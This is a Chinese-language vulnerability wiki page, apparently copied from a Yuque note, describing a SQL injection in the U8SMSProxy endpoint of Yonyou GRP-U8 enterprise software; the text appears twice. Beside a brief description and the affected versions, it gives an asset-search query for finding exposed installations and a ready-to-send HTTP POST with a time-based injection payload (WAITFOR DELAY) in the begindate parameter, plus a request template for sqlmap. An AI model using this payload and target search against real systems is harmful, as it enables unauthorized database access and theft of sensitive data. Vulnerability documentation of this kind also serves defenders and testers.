fofamini-wiki

登录白背景

源码

用友GRP-U8 U8SMSProxy sql注入

一、漏洞简介

用友GRP-U8是用友软件推出的一款企业级管理软件套件，旨在帮助企业实现全面的数字化管理和业务优化。用友GRP-U8 U8SMSProxy接口对用户传入的参数未进行有效的过滤，直接拼接到SQL查询语句中，导致SQL注入漏洞。攻击者通过该漏洞可以获取数据库敏感信息。

二、影响版本

用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）
用友GRP-U8 高校内控管理软件（Manager版）

三、资产测绘

hunterapp.name="用友GRP-U8 OA"
特征

四、漏洞复现

POST /U8SMSProxy?class=XXNote&id=qryyfs HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=FD111DFB1059473AF214DB0E529918E5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

begindate=2020-09-27';WAITFOR DELAY '0:0:5'--&enddate=2020-10-27&search=

sqlmap

POST /U8SMSProxy?class=XXNote&id=qryyfs HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=FD111DFB1059473AF214DB0E529918E5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

begindate=2020-09-27&enddate=2020-10-27&search=

原文: https://www.yuque.com/xiaokp7/ocvun2/rndhl06wlw5pemxa

# 用友GRP-U8 U8SMSProxy sql注入

# 一、漏洞简介
用友GRP-U8是用友软件推出的一款企业级管理软件套件，旨在帮助企业实现全面的数字化管理和业务优化。用友GRP-U8 U8SMSProxy接口对用户传入的参数未进行有效的过滤，直接拼接到SQL查询语句中，导致SQL注入漏洞。攻击者通过该漏洞可以获取数据库敏感信息。

# 二、影响版本

- 用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）
- 用友GRP-U8 高校内控管理软件（Manager版）

# 三、资产测绘

- hunter`app.name="用友GRP-U8 OA"`
- 特征

![image.png](./img/2s6DsYaGwMccnYg1/1696132271756-860b06b9-a041-40a7-801c-1d19f68283a6-108729.png)
![image.png](./img/2s6DsYaGwMccnYg1/1696132517728-7a746455-5255-4276-97e0-2f7c40f6cb39-474997.png)
![image.png](./img/2s6DsYaGwMccnYg1/1696132546612-e8cecff0-554c-44de-a6f7-497c1618908d-009654.png)

# 四、漏洞复现
```
POST /U8SMSProxy?class=XXNote&id=qryyfs HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=FD111DFB1059473AF214DB0E529918E5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

begindate=2020-09-27';WAITFOR DELAY '0:0:5'--&enddate=2020-10-27&search=
```
![image.png](./img/2s6DsYaGwMccnYg1/1701357832951-035d1775-b5e3-424f-add9-632cc9e13e97-537952.png)
sqlmap
```
POST /U8SMSProxy?class=XXNote&id=qryyfs HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=FD111DFB1059473AF214DB0E529918E5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

begindate=2020-09-27&enddate=2020-10-27&search=
```
![image.png](./img/2s6DsYaGwMccnYg1/1701357855125-25f52d10-8363-4ece-a22c-cfbca855c8c1-720429.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rndhl06wlw5pemxa>